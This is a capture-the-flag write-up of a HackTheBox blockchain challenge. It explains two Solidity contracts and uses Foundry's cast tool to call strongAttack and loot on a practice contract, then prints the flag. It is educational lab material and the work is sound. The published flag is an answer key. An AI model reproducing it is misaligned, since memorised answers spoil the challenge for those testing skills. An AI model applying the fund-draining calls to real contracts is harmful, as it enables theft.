We covered an introduction to blockchain penetration testing by taking on a blockchain challenge from HackTheBox where we were presented with the challenge source code that included a code in solidity language with a couple functions that handle the challenge. We installed foundryup suite of tools to interact with the chain. We used cast tool to interact with the functions, namely loot(), strongattack() and punch() to solve the challenge. This was part of HackTheBox Survival Of The Fittest
Solidity Language
Solidity is a language commonly used in developing blockchain applications.
Interaction With The BlockChain
To interact with the chain, we will need the below information
Private key
The address of the target contract
The RPC URL
The Challenge
Think of this step as being a digital detective analyzing a mystery. You’re provided with two Solidity smart contracts: Setup.sol
and Creature.sol
, which serve as the game’s framework.
Setup.sol
initiates the challenge by deploying aCreature
contract and funding it with 1 ether. Your mission is to drain this balance completely.Creature.sol
defines your opponent—the creature you need to defeat. It starts with 20 life points, and your objective is to reduce these points to zero to claim victory.
To capture the flag, you must bring the creature’s life points from 20 to 0. You can do this using two attack options:
punch()
– a basic attack that deals 1 damage.strongAttack(uint256 _damage)
– a more powerful attack where you choose the damage.
Flags
You can either create a script or simply use Foundry tools. Run the commands listed below, modify the URL by replacing “tag” with “flag”, and you’ll retrieve the flag.
cast send <TargetAddress> "strongAttack(uint256)" 20--rpc-url <RPC URL> --interactive
cast send <TargetAddress> "loot()" --rpc-url <RPC URL> --interactive
HTB{g0t_y0u2_f1r5t_b100d}